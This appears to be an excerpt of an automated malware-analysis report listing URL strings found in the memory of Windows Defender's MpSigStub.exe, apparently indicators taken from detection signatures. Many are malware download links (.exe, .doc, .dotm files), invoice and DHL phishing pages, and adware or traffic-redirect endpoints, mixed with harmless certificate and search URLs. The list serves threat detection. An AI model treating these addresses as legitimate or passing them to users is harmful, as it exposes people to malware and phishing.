Source: MpSigStub.exe, 00000024.00000003.6439501262.00000197A4A33000.00000004.00000001.sdmp	String found in binary or memory: http://pssquared.com/invoice-status/tracking-number-and-invoice-of-your-order/
Source: MpSigStub.exe, 00000024.00000003.6274276311.00000197A2E51000.00000004.00000001.sdmp	String found in binary or memory: http://psynergi.dk/data
Source: MpSigStub.exe, 00000024.00000003.6435021591.00000197A4A76000.00000004.00000001.sdmp	String found in binary or memory: http://ptnetproject.info/yrniii/yrniii/yrniii/yrniii/index.php
Source: MpSigStub.exe, 00000024.00000003.6327908307.00000197A40EC000.00000004.00000001.sdmp	String found in binary or memory: http://pubs.vmware.com
Source: MpSigStub.exe, 00000024.00000003.6435742963.00000197A3D91000.00000004.00000001.sdmp	String found in binary or memory: http://pulp99.com/
Source: MpSigStub.exe, 00000024.00000003.6439967654.00000197A4446000.00000004.00000001.sdmp	String found in binary or memory: http://pulp99.com/1.rtf
Source: MpSigStub.exe, 00000024.00000003.6436704102.00000197A4AFA000.00000004.00000001.sdmp	String found in binary or memory: http://purelyrighteous.com/redirect/amvubmlmzxiubw9uy3jpzwzmqde4mjuuy29t
Source: MpSigStub.exe, 00000024.00000003.6436377560.00000197A4C85000.00000004.00000001.sdmp	String found in binary or memory: http://pursuitvision.com/templates/pursuitvision/images/hybrid-app/ms
Source: MpSigStub.exe, 00000024.00000003.6322693408.00000197A3BC3000.00000004.00000001.sdmp	String found in binary or memory: http://pusat-hacing.blogspot.com/
Source: MpSigStub.exe, 00000024.00000003.6436704102.00000197A4AFA000.00000004.00000001.sdmp	String found in binary or memory: http://pznjaslo.pl/wp-content/outstanding-invoices/
Source: MpSigStub.exe, 00000024.00000003.6434542406.00000197A437F000.00000004.00000001.sdmp	String found in binary or memory: http://q-i-e-n.com/
Source: MpSigStub.exe, 00000024.00000003.6290858289.00000197A33BE000.00000004.00000001.sdmp	String found in binary or memory: http://qiiqur.com/frix.exe
Source: MpSigStub.exe, 00000024.00000003.6321843775.00000197A2FD4000.00000004.00000001.sdmp	String found in binary or memory: http://quantsa.ru/?de
Source: MpSigStub.exe, 00000024.00000003.6288538370.00000197A46DA000.00000004.00000001.sdmp	String found in binary or memory: http://quickinstallpack.com/quickinstall/order.php?qad=cln&qld=
Source: MpSigStub.exe, 00000024.00000003.6290858289.00000197A33BE000.00000004.00000001.sdmp	String found in binary or memory: http://quickuploader.xyz/Kalkkulerne.exe
Source: MpSigStub.exe, 00000024.00000003.6435742963.00000197A3D91000.00000004.00000001.sdmp	String found in binary or memory: http://quince78.cyan.ero0101.com/set_inf.php?id=ero257.wmv&sid=
Source: MpSigStub.exe, 00000024.00000003.6437789522.00000197A392D000.00000004.00000001.sdmp	String found in binary or memory: http://qwst1t.3322.org:8087
Source: MpSigStub.exe, 00000024.00000003.6436704102.00000197A4AFA000.00000004.00000001.sdmp	String found in binary or memory: http://qwuyegasd3edarq6yu.org/mSsQDIMIQ/ind7694GDs/
Source: MpSigStub.exe, 00000024.00000003.6320871262.00000197A4180000.00000004.00000001.sdmp	String found in binary or memory: http://r%d.clrsch.com/
Source: MpSigStub.exe, 00000024.00000003.6320871262.00000197A4180000.00000004.00000001.sdmp	String found in binary or memory: http://r%d.clrsch.com/ie/
Source: MpSigStub.exe, 00000024.00000003.6320871262.00000197A4180000.00000004.00000001.sdmp	String found in binary or memory: http://r%d.clrsch.com/x
Source: MpSigStub.exe, 00000024.00000003.6274276311.00000197A2E51000.00000004.00000001.sdmp	String found in binary or memory: http://r.funmoods.com//
Source: MpSigStub.exe, 00000024.00000003.6433381009.00000197A3C87000.00000004.00000001.sdmp	String found in binary or memory: http://r.zerotime.kr/
Source: MpSigStub.exe, 00000024.00000003.6440763384.00000197A4E29000.00000004.00000001.sdmp	String found in binary or memory: http://r3.o.lencr.org/
Source: MpSigStub.exe, 00000024.00000003.6330297949.00000197A369B000.00000004.00000001.sdmp	String found in binary or memory: http://raa.qwepoii.org/v4/gtg/
Source: MpSigStub.exe, 00000024.00000003.6440763384.00000197A4E29000.00000004.00000001.sdmp	String found in binary or memory: http://raggina.space/bc855646d052/spool/boot/acxbbz.dot
Source: MpSigStub.exe, 00000024.00000003.6437789522.00000197A392D000.00000004.00000001.sdmp	String found in binary or memory: http://random.99lnk.com/y8btd3lq
Source: MpSigStub.exe, 00000024.00000003.6434542406.00000197A437F000.00000004.00000001.sdmp	String found in binary or memory: http://randominterest.com/
Source: MpSigStub.exe, 00000024.00000003.6283505070.00000197A475E000.00000004.00000001.sdmp	String found in binary or memory: http://rapidshare.com/files/
Source: MpSigStub.exe, 00000024.00000003.6282020026.00000197A450D000.00000004.00000001.sdmp	String found in binary or memory: http://readlenta.ru/
Source: MpSigStub.exe, 00000024.00000003.6430342028.00000197A4BC0000.00000004.00000001.sdmp	String found in binary or memory: http://rebrand.ly/ohxnqak
Source: MpSigStub.exe, 00000024.00000003.6291090515.00000197A33E4000.00000004.00000001.sdmp, MpSigStub.exe, 00000024.00000003.6341224894.00000197A35D4000.00000004.00000001.sdmp	String found in binary or memory: http://recoverpcerror.com/
Source: MpSigStub.exe, 00000024.00000003.6435021591.00000197A4A76000.00000004.00000001.sdmp	String found in binary or memory: http://redirect.sarahwilkesphotography.co.uk)
Source: MpSigStub.exe, 00000024.00000003.6315705690.00000197A4027000.00000004.00000001.sdmp	String found in binary or memory: http://redirsystem32.com
Source: MpSigStub.exe, 00000024.00000003.6315705690.00000197A4027000.00000004.00000001.sdmp	String found in binary or memory: http://redirsystem32.com/tds1/in.cgi?2&group=mp3
Source: MpSigStub.exe, 00000024.00000003.6434542406.00000197A437F000.00000004.00000001.sdmp	String found in binary or memory: http://redlogisticsmaroc.com/
Source: MpSigStub.exe, 00000024.00000003.6434542406.00000197A437F000.00000004.00000001.sdmp	String found in binary or memory: http://redlogisticsmaroc.com/ti/doc/
Source: MpSigStub.exe, 00000024.00000003.6435021591.00000197A4A76000.00000004.00000001.sdmp	String found in binary or memory: http://reefer.parts/js/lib/)
Source: MpSigStub.exe, 00000024.00000003.6432316317.00000197A4DA4000.00000004.00000001.sdmp	String found in binary or memory: http://referfile.com
Source: MpSigStub.exe, 00000024.00000003.6322693408.00000197A3BC3000.00000004.00000001.sdmp	String found in binary or memory: http://refud.me/scan.php
Source: MpSigStub.exe, 00000024.00000003.6320871262.00000197A4180000.00000004.00000001.sdmp	String found in binary or memory: http://registrywizard.com
Source: MpSigStub.exe, 00000024.00000003.6435021591.00000197A4A76000.00000004.00000001.sdmp	String found in binary or memory: http://relawananaksumsel.or.id/blosting/scan.html)
Source: MpSigStub.exe, 00000024.00000003.6436704102.00000197A4AFA000.00000004.00000001.sdmp	String found in binary or memory: http://remitenow.one/
Source: MpSigStub.exe, 00000024.00000003.6322693408.00000197A3BC3000.00000004.00000001.sdmp	String found in binary or memory: http://remote-keylogger.net
Source: MpSigStub.exe, 00000024.00000003.6339573341.00000197A3E6C000.00000004.00000001.sdmp	String found in binary or memory: http://remove.gettango.com/
Source: MpSigStub.exe, 00000024.00000003.6332905468.00000197A3592000.00000004.00000001.sdmp	String found in binary or memory: http://renatopaschoal.com.br/dropbox/
Source: MpSigStub.exe, 00000024.00000003.6341224894.00000197A35D4000.00000004.00000001.sdmp	String found in binary or memory: http://report.wallpaper.shqingzao.com
Source: MpSigStub.exe, 00000024.00000003.6341224894.00000197A35D4000.00000004.00000001.sdmp	String found in binary or memory: http://report.wallpaper.shqingzao.com~
Source: MpSigStub.exe, 00000024.00000003.6288538370.00000197A46DA000.00000004.00000001.sdmp	String found in binary or memory: http://reports.montiera.com/reports/jsRprt.srf?rid=nsis&nsisState=
Source: MpSigStub.exe, 00000024.00000003.6288538370.00000197A46DA000.00000004.00000001.sdmp	String found in binary or memory: http://reports.montiera.com/reports/jsRprt.srf?rid=nsis&nsisState=xl
Source: MpSigStub.exe, 00000024.00000003.6354030665.00000197A41B3000.00000004.00000001.sdmp	String found in binary or memory: http://repository.certum.pl/ctnca.cer09
Source: MpSigStub.exe, 00000024.00000003.6284057981.00000197A47A0000.00000004.00000001.sdmp	String found in binary or memory: http://repository.swisssign.com/0
Source: MpSigStub.exe, 00000024.00000003.6435742963.00000197A3D91000.00000004.00000001.sdmp	String found in binary or memory: http://requestbin.net/r/163xiqa1
Source: MpSigStub.exe, 00000024.00000003.6435742963.00000197A3D91000.00000004.00000001.sdmp	String found in binary or memory: http://res-backup.com/bin/3.dotm
Source: MpSigStub.exe, 00000024.00000003.6328862944.00000197A3361000.00000004.00000001.sdmp	String found in binary or memory: http://resource.aldtop.com
Source: MpSigStub.exe, 00000024.00000003.6430077076.00000197A46D9000.00000004.00000001.sdmp	String found in binary or memory: http://retinnoplay.com//ord/excelz/index.php
Source: MpSigStub.exe, 00000024.00000003.6430077076.00000197A46D9000.00000004.00000001.sdmp	String found in binary or memory: http://retirepedia.upsproutmedia.com/obskdhi.php
Source: MpSigStub.exe, 00000024.00000003.6327908307.00000197A40EC000.00000004.00000001.sdmp	String found in binary or memory: http://rewards.getjar.com
Source: MpSigStub.exe, 00000024.00000003.6304100006.00000197A2F93000.00000004.00000001.sdmp	String found in binary or memory: http://rezultsd.info/cd/cd.php?id=%s&ver=ig1
Source: MpSigStub.exe, 00000024.00000003.6439967654.00000197A4446000.00000004.00000001.sdmp	String found in binary or memory: http://rgho.st/download/8ygs8ldbj/3887c2b13922a712c34f8f2407d142bb5b2ed630/3887c2b13922a712c34f8f240
Source: MpSigStub.exe, 00000024.00000003.6311649432.00000197A38AA000.00000004.00000001.sdmp	String found in binary or memory: http://rghost.net/download/
Source: MpSigStub.exe, 00000024.00000003.6435021591.00000197A4A76000.00000004.00000001.sdmp	String found in binary or memory: http://rhriss.com.br/site/tmp/swagin
Source: MpSigStub.exe, 00000024.00000003.6290858289.00000197A33BE000.00000004.00000001.sdmp	String found in binary or memory: http://rilaer.com/IfAmGZIJjbwzvKNTxSPM/ixcxmzcvqi.exe
Source: MpSigStub.exe, 00000024.00000003.6268699778.00000197A4FF7000.00000004.00000001.sdmp	String found in binary or memory: http://risweg.com/flpaoql.exe
Source: MpSigStub.exe, 00000024.00000003.6324198203.00000197A492C000.00000004.00000001.sdmp	String found in binary or memory: http://rl.ammyy.com
Source: MpSigStub.exe, 00000024.00000003.6351148277.00000197A49F2000.00000004.00000001.sdmp	String found in binary or memory: http://rmportal.bpweb.bp.comx
Source: MpSigStub.exe, 00000024.00000003.6430342028.00000197A4BC0000.00000004.00000001.sdmp	String found in binary or memory: http://rmuxvayun.pkrgzrpdebksbl.gq:23513/eater.htm?little=15162&extent=kiss&switch=19450
Source: MpSigStub.exe, 00000024.00000003.6307634469.00000197A2ED4000.00000004.00000001.sdmp	String found in binary or memory: http://rocesi.com/mncejd.exe
Source: MpSigStub.exe, 00000024.00000003.6435021591.00000197A4A76000.00000004.00000001.sdmp	String found in binary or memory: http://royalambassadorschools.com/wp-admin/includes/ftools/johnhood395.php
Source: MpSigStub.exe, 00000024.00000003.6437415503.00000197A38EC000.00000004.00000001.sdmp	String found in binary or memory: http://roybeth.com/ext/jquery.php
Source: MpSigStub.exe, 00000024.00000003.6324553749.00000197A3B81000.00000004.00000001.sdmp	String found in binary or memory: http://rrppdigital.com.ve/wp-content/ai1wm-backups/chrome.jpg
Source: MpSigStub.exe, 00000024.00000003.6271796009.00000197A32DD000.00000004.00000001.sdmp	String found in binary or memory: http://rs-moto.ru/counter/?a=1
Source: MpSigStub.exe, 00000024.00000003.6434542406.00000197A437F000.00000004.00000001.sdmp	String found in binary or memory: http://ruih.co.uk/
Source: MpSigStub.exe, 00000024.00000003.6434542406.00000197A437F000.00000004.00000001.sdmp	String found in binary or memory: http://ruih.co.uk/wapp/doc/
Source: MpSigStub.exe, 00000024.00000003.6441407992.00000197A4404000.00000004.00000001.sdmp	String found in binary or memory: http://rustiquewellness.nl/7za.png
Source: MpSigStub.exe, 00000024.00000003.6274276311.00000197A2E51000.00000004.00000001.sdmp	String found in binary or memory: http://s-elisa.ru/data
Source: MpSigStub.exe, 00000024.00000003.6280960340.00000197A4381000.00000004.00000001.sdmp	String found in binary or memory: http://s.earching.info/
Source: MpSigStub.exe, 00000024.00000003.6280960340.00000197A4381000.00000004.00000001.sdmp	String found in binary or memory: http://s.earching.info/xA
Source: MpSigStub.exe, 00000024.00000003.6354030665.00000197A41B3000.00000004.00000001.sdmp	String found in binary or memory: http://s.symcb.com/pca3-g5.crl0
Source: MpSigStub.exe, 00000024.00000003.6354030665.00000197A41B3000.00000004.00000001.sdmp	String found in binary or memory: http://s.symcd.com0_
Source: MpSigStub.exe, 00000024.00000003.6274276311.00000197A2E51000.00000004.00000001.sdmp	String found in binary or memory: http://s.xcodelib.net/updates/ff/apps/111/pubid1001affid100100
Source: MpSigStub.exe, 00000024.00000003.6274276311.00000197A2E51000.00000004.00000001.sdmp	String found in binary or memory: http://s.xcodelib.net/updates/ff/apps/116/pubid1004affid100400
Source: MpSigStub.exe, 00000024.00000003.6274276311.00000197A2E51000.00000004.00000001.sdmp	String found in binary or memory: http://s.xcodelib.net/updates/ff/apps/119/pubid1008affid100800
Source: MpSigStub.exe, 00000024.00000003.6429536769.00000197A4656000.00000004.00000001.sdmp	String found in binary or memory: http://s2.bestmanage.org/?name=%s
Source: MpSigStub.exe, 00000024.00000003.6282020026.00000197A450D000.00000004.00000001.sdmp	String found in binary or memory: http://s3-us-west-2.amazonaws.com/elasticbeanstalk-us-west-2-143692468872/Installer.exe
Source: MpSigStub.exe, 00000024.00000003.6331200392.00000197A38EC000.00000004.00000001.sdmp	String found in binary or memory: http://s3.amazonaws.com/adpk/getsavin/getsavin.ini/noproxygetoksettingslocation2http://s3.amazonaws.
Source: MpSigStub.exe, 00000024.00000003.6435742963.00000197A3D91000.00000004.00000001.sdmp	String found in binary or memory: http://s3.amazonaws.com/rewqqq/
Source: MpSigStub.exe, 00000024.00000003.6430342028.00000197A4BC0000.00000004.00000001.sdmp	String found in binary or memory: http://sabadabe.xyz/_output2b172f0.exe
Source: MpSigStub.exe, 00000024.00000003.6431842764.00000197A4D63000.00000004.00000001.sdmp	String found in binary or memory: http://saemaeul.mireene.com/skin/board/basic/bin
Source: MpSigStub.exe, 00000024.00000003.6331200392.00000197A38EC000.00000004.00000001.sdmp	String found in binary or memory: http://safesaver.net/
Source: MpSigStub.exe, 00000024.00000003.6436377560.00000197A4C85000.00000004.00000001.sdmp	String found in binary or memory: http://sahane34sohbet.000webhostapp.com/wp-content/themes/elbee-elgee
Source: MpSigStub.exe, 00000024.00000003.6432316317.00000197A4DA4000.00000004.00000001.sdmp	String found in binary or memory: http://saintechelon.tk/11.doc
Source: MpSigStub.exe, 00000024.00000003.6432316317.00000197A4DA4000.00000004.00000001.sdmp	String found in binary or memory: http://saintechelon.tk/ejl.doc
Source: MpSigStub.exe, 00000024.00000003.6347934302.00000197A4E28000.00000004.00000001.sdmp	String found in binary or memory: http://sameshitasiteverwas.com/traf/tds/in.cgi
Source: MpSigStub.exe, 00000024.00000003.6273475176.00000197A3D51000.00000004.00000001.sdmp	String found in binary or memory: http://sandbaggersgolf.club/viewdoc/file.php?document=y2fzyxnqqgzlcnjlci5jb20=
Source: MpSigStub.exe, 00000024.00000003.6286857920.00000197A49B1000.00000004.00000001.sdmp	String found in binary or memory: http://santasalete.sp.gov.br/jss/
Source: MpSigStub.exe, 00000024.00000003.6435021591.00000197A4A76000.00000004.00000001.sdmp	String found in binary or memory: http://saraylimucevherat.com/docfile/good/)
Source: MpSigStub.exe, 00000024.00000003.6273475176.00000197A3D51000.00000004.00000001.sdmp	String found in binary or memory: http://saveasapp.com/
Source: MpSigStub.exe, 00000024.00000003.6438240606.00000197A36DD000.00000004.00000001.sdmp	String found in binary or memory: http://saveimage.pw
Source: MpSigStub.exe, 00000024.00000003.6435742963.00000197A3D91000.00000004.00000001.sdmp	String found in binary or memory: http://savory15.pansy.ero0101.com/set_inf.php?id=ero257.wmv&sid=
Source: MpSigStub.exe, 00000024.00000003.6327908307.00000197A40EC000.00000004.00000001.sdmp	String found in binary or memory: http://sbrenind.com/niggab-x/niggab-x.exe
Source: MpSigStub.exe, 00000024.00000003.6293664511.00000197A3192000.00000004.00000001.sdmp	String found in binary or memory: http://sc-cash.com
Source: MpSigStub.exe, 00000024.00000003.6441407992.00000197A4404000.00000004.00000001.sdmp	String found in binary or memory: http://scaladevelopments.scaladevco
Source: MpSigStub.exe, 00000024.00000003.6441407992.00000197A4404000.00000004.00000001.sdmp	String found in binary or memory: http://scaladevelopments.scaladevco.com/17/
Source: MpSigStub.exe, 00000024.00000003.6436377560.00000197A4C85000.00000004.00000001.sdmp	String found in binary or memory: http://scarecrowlawncare.com/wp-content/themes/sensible-wp/img/gr.mpwq
Source: UserOOBEBroker.exe, 00000017.00000002.7880664177.000001F548370000.00000002.00020000.sdmp	String found in binary or memory: http://schemas.microso
Source: MpSigStub.exe, 00000024.00000003.6271076584.00000197A3A37000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
Source: MpSigStub.exe, 00000024.00000003.6436377560.00000197A4C85000.00000004.00000001.sdmp	String found in binary or memory: http://schildersbedrijfdickrorije.nl/wp-content/upgrade/resume.php?id=
Source: MpSigStub.exe, 00000024.00000003.6434542406.00000197A437F000.00000004.00000001.sdmp	String found in binary or memory: http://schoolaredu.com/
Source: MpSigStub.exe, 00000024.00000003.6435021591.00000197A4A76000.00000004.00000001.sdmp	String found in binary or memory: http://scorpion-swan.com/bene/dhl/dhl.php)
Source: MpSigStub.exe, 00000024.00000003.6318964208.00000197A48A9000.00000004.00000001.sdmp	String found in binary or memory: http://scorpion-swan.com/lamba/loginpdf.html)/type/action/s/uri
Source: MpSigStub.exe, 00000024.00000003.6432316317.00000197A4DA4000.00000004.00000001.sdmp	String found in binary or memory: http://screenhost.pw/
Source: MpSigStub.exe, 00000024.00000003.6307634469.00000197A2ED4000.00000004.00000001.sdmp	String found in binary or memory: http://screw-malwrhunterteam.com/
Source: MpSigStub.exe, 00000024.00000003.6432316317.00000197A4DA4000.00000004.00000001.sdmp	String found in binary or memory: http://scrollayer.com
Source: MpSigStub.exe, 00000024.00000003.6432316317.00000197A4DA4000.00000004.00000001.sdmp	String found in binary or memory: http://scud.pipis.net/
Source: MpSigStub.exe, 00000024.00000003.6320871262.00000197A4180000.00000004.00000001.sdmp	String found in binary or memory: http://sds.clrsch.com/
Source: MpSigStub.exe, 00000024.00000003.6320871262.00000197A4180000.00000004.00000001.sdmp	String found in binary or memory: http://sds.clrsch.com/x
Source: MpSigStub.exe, 00000024.00000003.6320871262.00000197A4180000.00000004.00000001.sdmp	String found in binary or memory: http://sds.qckads.com/sidesearch/
Source: MpSigStub.exe, 00000024.00000003.6441407992.00000197A4404000.00000004.00000001.sdmp	String found in binary or memory: http://seal.elitevs.net/Base
Source: MpSigStub.exe, 00000024.00000003.6441407992.00000197A4404000.00000004.00000001.sdmp	String found in binary or memory: http://seal.nimoru.com/Base/
Source: MpSigStub.exe, 00000024.00000003.6279581351.00000197A4A76000.00000004.00000001.sdmp	String found in binary or memory: http://search.17173.com/index.jsp?keyword=%s
Source: MpSigStub.exe, 00000024.00000003.6279581351.00000197A4A76000.00000004.00000001.sdmp	String found in binary or memory: http://search.btchina.net/search.php?query=%s
Source: MpSigStub.exe, 00000024.00000003.6284057981.00000197A47A0000.00000004.00000001.sdmp	String found in binary or memory: http://search.cn.yahoo.com/search?p=
Source: MpSigStub.exe, 00000024.00000003.6279581351.00000197A4A76000.00000004.00000001.sdmp	String found in binary or memory: http://search.crsky.com/search.asp?sType=ResName&keyword=%s
Source: MpSigStub.exe, 00000024.00000003.6279581351.00000197A4A76000.00000004.00000001.sdmp	String found in binary or memory: http://search.dangdang.com/dangdang.dll?mode=1020&catalog=100&key1=%s
Source: MpSigStub.exe, 00000024.00000003.6279581351.00000197A4A76000.00000004.00000001.sdmp	String found in binary or memory: http://search.games.sina.com.cn/cgi-bin/game_search/game_deal.cgi?keywords=%s
Source: MpSigStub.exe, 00000024.00000003.6331200392.00000197A38EC000.00000004.00000001.sdmp	String found in binary or memory: http://search.getwebcake.com/
Source: MpSigStub.exe, 00000024.00000003.6339573341.00000197A3E6C000.00000004.00000001.sdmp	String found in binary or memory: http://search.lycos.com/default.asp?src=clear
Source: MpSigStub.exe, 00000024.00000003.6279581351.00000197A4A76000.00000004.00000001.sdmp	String found in binary or memory: http://search.newhua.com/search.asp?Keyword=%s
Source: MpSigStub.exe, 00000024.00000003.6277859035.00000197A392F000.00000004.00000001.sdmp	String found in binary or memory: http://search.psn.cn/
Source: MpSigStub.exe, 00000024.00000003.6326616398.00000197A3216000.00000004.00000001.sdmp	String found in binary or memory: http://search.shopnav.com/
Source: MpSigStub.exe, 00000024.00000003.6326616398.00000197A3216000.00000004.00000001.sdmp	String found in binary or memory: http://search.shopnav.com/_
Source: MpSigStub.exe, 00000024.00000003.6279581351.00000197A4A76000.00000004.00000001.sdmp	String found in binary or memory: http://search.union.yahoo.com.cn/click/search.htm?m=
Source: MpSigStub.exe, 00000024.00000003.6439090002.00000197A49F2000.00000004.00000001.sdmp	String found in binary or memory: http://searchglobalsite.com/in.cgi?
Source: MpSigStub.exe, 00000024.00000003.6326212702.00000197A31D5000.00000004.00000001.sdmp	String found in binary or memory: http://secure4709.spaldingscpa.com/con/next.php
Source: MpSigStub.exe, 00000024.00000003.6320453518.00000197A412F000.00000004.00000001.sdmp	String found in binary or memory: http://security-updater.com/binaries/
Source: MpSigStub.exe, 00000024.00000003.6429813058.00000197A4697000.00000004.00000001.sdmp	String found in binary or memory: http://security.symantec.com
Source: MpSigStub.exe, 00000024.00000003.6323451282.00000197A3C46000.00000004.00000001.sdmp	String found in binary or memory: http://seedstar.net
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp	String found in binary or memory: http://seek.3721.com/srchasst.htm
Source: MpSigStub.exe, 00000024.00000003.6432316317.00000197A4DA4000.00000004.00000001.sdmp	String found in binary or memory: http://seliconos.3utilities.com/
Source: MpSigStub.exe, 00000024.00000003.6337394565.00000197A4314000.00000004.00000001.sdmp	String found in binary or memory: http://sense-super.com/cgi/execute_log.cgi?filename=debug&type=failed_registry_read
Source: MpSigStub.exe, 00000024.00000003.6435742963.00000197A3D91000.00000004.00000001.sdmp	String found in binary or memory: http://seocom.name/seogo/go.xmn?ix
Source: MpSigStub.exe, 00000024.00000003.6433381009.00000197A3C87000.00000004.00000001.sdmp	String found in binary or memory: http://sepa-europa.eu
Source: MpSigStub.exe, 00000024.00000003.6415513577.00000197A3D91000.00000004.00000001.sdmp	String found in binary or memory: http://serbetcimimarlik.com/tests/folder/excell.php
Source: MpSigStub.exe, 00000024.00000003.6336985744.00000197A3426000.00000004.00000001.sdmp	String found in binary or memory: http://sertifikati.ca.posta.rs/crl/PostaCARoot.crl0
Source: MpSigStub.exe, 00000024.00000003.6430342028.00000197A4BC0000.00000004.00000001.sdmp	String found in binary or memory: http://server00.send6.com/1abf8588/oluwa.exe
Source: MpSigStub.exe, 00000024.00000003.6438240606.00000197A36DD000.00000004.00000001.sdmp	String found in binary or memory: http://server2.39slxu3bw.ru/restore.xmlscrobj.dll
Source: MpSigStub.exe, 00000024.00000003.6290858289.00000197A33BE000.00000004.00000001.sdmp	String found in binary or memory: http://service.pandtelectric.com/
Source: MpSigStub.exe, 00000024.00000003.6335436052.00000197A3016000.00000004.00000001.sdmp	String found in binary or memory: http://service.softpost.com
Source: MpSigStub.exe, 00000024.00000003.6269311104.00000197A4C03000.00000004.00000001.sdmp	String found in binary or memory: http://service.srvmd6.com/Mac/getInstallerSettings/?version=
Source: MpSigStub.exe, 00000024.00000003.6327908307.00000197A40EC000.00000004.00000001.sdmp	String found in binary or memory: http://serving.myshopcouponmac.com
Source: MpSigStub.exe, 00000024.00000003.6435742963.00000197A3D91000.00000004.00000001.sdmp	String found in binary or memory: http://sesame96.orange.ero0101.com/set_inf.php?id=ero257.wmv&cid=
Source: MpSigStub.exe, 00000024.00000003.6435742963.00000197A3D91000.00000004.00000001.sdmp	String found in binary or memory: http://sesame96.orange.ero0101.com/set_inf.php?id=ero257.wmv&sid=
Source: MpSigStub.exe, 00000024.00000003.6439501262.00000197A4A33000.00000004.00000001.sdmp	String found in binary or memory: http://session-dyfm.clientmsg13.review/8446c35a41f9e820533b6cd008b40749?fpcum=&dyfm=ywx2yxjvx3zl
Source: MpSigStub.exe, 00000024.00000003.6323790490.00000197A4866000.00000004.00000001.sdmp	String found in binary or memory: http://setup-mediaplayer.info/
Source: MpSigStub.exe, 00000024.00000003.6277859035.00000197A392F000.00000004.00000001.sdmp	String found in binary or memory: http://setup.theoreon.com
Source: MpSigStub.exe, 00000024.00000003.6337394565.00000197A4314000.00000004.00000001.sdmp	String found in binary or memory: http://setup1.tqzn.com/barbindsoft/barsetup.exe
Source: MpSigStub.exe, 00000024.00000003.6337394565.00000197A4314000.00000004.00000001.sdmp	String found in binary or memory: http://setup2.tqzn.com/barbindsoft/barsetup.exe
Source: MpSigStub.exe, 00000024.00000003.6337394565.00000197A4314000.00000004.00000001.sdmp	String found in binary or memory: http://setup3.tqzn.com/barbindsoft/barsetup.exe
Source: MpSigStub.exe, 00000024.00000003.6337394565.00000197A4314000.00000004.00000001.sdmp	String found in binary or memory: http://setup4.tqzn.com/barbindsoft/barsetup.exe
Source: MpSigStub.exe, 00000024.00000003.6434542406.00000197A437F000.00000004.00000001.sdmp	String found in binary or memory: http://seunelson.com.br/js/10.exe
Source: MpSigStub.exe, 00000024.00000003.6434542406.00000197A437F000.00000004.00000001.sdmp	String found in binary or memory: http://seunelson.com.br/js/content.xml
Source: MpSigStub.exe, 00000024.00000003.6347934302.00000197A4E28000.00000004.00000001.sdmp	String found in binary or memory: http://seuufhehfueughek.ws/
Source: MpSigStub.exe, 00000024.00000003.6435742963.00000197A3D91000.00000004.00000001.sdmp	String found in binary or memory: http://sexfellatiomovesex.com/pc/page/set_reg.php?code=&cuid=
Source: MpSigStub.exe, 00000024.00000003.6328862944.00000197A3361000.00000004.00000001.sdmp	String found in binary or memory: http://sf-addon.com/helper/setup/SaveFromNetHelper-Setup.exe
Source: MpSigStub.exe, 00000024.00000003.6439501262.00000197A4A33000.00000004.00000001.sdmp	String found in binary or memory: http://sf3q2wrq34.ddns.net
Source: MpSigStub.exe, 00000024.00000003.6338261504.00000197A4590000.00000004.00000001.sdmp	String found in binary or memory: http://shdjhgftyhgjklolkjio.dns.navy/bcz/document.doc
Source: MpSigStub.exe, 00000024.00000003.6439090002.00000197A49F2000.00000004.00000001.sdmp	String found in binary or memory: http://shintorg-k.ru/errors/wpactivt.php
Source: MpSigStub.exe, 00000024.00000003.6310450817.00000197A4AFA000.00000004.00000001.sdmp	String found in binary or memory: http://shop.doublepoint.net//install/uplist2.php?pid=
Source: MpSigStub.exe, 00000024.00000003.6310450817.00000197A4AFA000.00000004.00000001.sdmp	String found in binary or memory: http://shop.doublepoint.net/install/p_boot.php
Source: MpSigStub.exe, 00000024.00000003.6430342028.00000197A4BC0000.00000004.00000001.sdmp	String found in binary or memory: http://shoppingjardin.com.py/v1/wp-themes/2.php
Source: MpSigStub.exe, 00000024.00000003.6434542406.00000197A437F000.00000004.00000001.sdmp	String found in binary or memory: http://show.daohang.la:5000/go/
Source: MpSigStub.exe, 00000024.00000003.6323089969.00000197A3C04000.00000004.00000001.sdmp	String found in binary or memory: http://sighttp.qq.com
Source: MpSigStub.exe, 00000024.00000003.6434542406.00000197A437F000.00000004.00000001.sdmp	String found in binary or memory: http://silver13.net/java.exe
Source: MpSigStub.exe, 00000024.00000003.6279246359.00000197A4A35000.00000004.00000001.sdmp	String found in binary or memory: http://simple%-files.com
Source: MpSigStub.exe, 00000024.00000003.6434542406.00000197A437F000.00000004.00000001.sdmp	String found in binary or memory: http://simplesexinc.com/file/
Source: MpSigStub.exe, 00000024.00000003.6430077076.00000197A46D9000.00000004.00000001.sdmp	String found in binary or memory: http://simsoshop.com/update.php?c=
Source: MpSigStub.exe, 00000024.00000003.6335436052.00000197A3016000.00000004.00000001.sdmp	String found in binary or memory: http://sindarspen.org.br/
Source: MpSigStub.exe, 00000024.00000003.6438240606.00000197A36DD000.00000004.00000001.sdmp	String found in binary or memory: http://sitem.biz/
Source: MpSigStub.exe, 00000024.00000003.6439090002.00000197A49F2000.00000004.00000001.sdmp	String found in binary or memory: http://skidware-malwrhunterteams.com/scanme.txt
Source: MpSigStub.exe, 00000024.00000003.6433381009.00000197A3C87000.00000004.00000001.sdmp	String found in binary or memory: http://skillfulteaching.com/cataxs/img
Source: MpSigStub.exe, 00000024.00000003.6271076584.00000197A3A37000.00000004.00000001.sdmp	String found in binary or memory: http://skorohod.city/invoice-corrections-for-
Source: MpSigStub.exe, 00000024.00000003.6338261504.00000197A4590000.00000004.00000001.sdmp	String found in binary or memory: http://skyfalss.ir/hacnhhy/
Source: MpSigStub.exe, 00000024.00000003.6290858289.00000197A33BE000.00000004.00000001.sdmp	String found in binary or memory: http://skype.tom.com/download/install/sobar.exe
Source: MpSigStub.exe, 00000024.00000003.6435021591.00000197A4A76000.00000004.00000001.sdmp	String found in binary or memory: http://slideshowlullabies.com/plugins/content/pagenavigation/item.php)
Source: MpSigStub.exe, 00000024.00000003.6434542406.00000197A437F000.00000004.00000001.sdmp	String found in binary or memory: http://slpsrgpsrhojifdij.ru/
Source: MpSigStub.exe, 00000024.00000003.6434542406.00000197A437F000.00000004.00000001.sdmp	String found in binary or memory: http://slpsrgpsrhojifdij.ru/krablin.exe?
Source: MpSigStub.exe, 00000024.00000003.6431842764.00000197A4D63000.00000004.00000001.sdmp	String found in binary or memory: http://sluzby-specjalne.cba.pl/nr26.txt
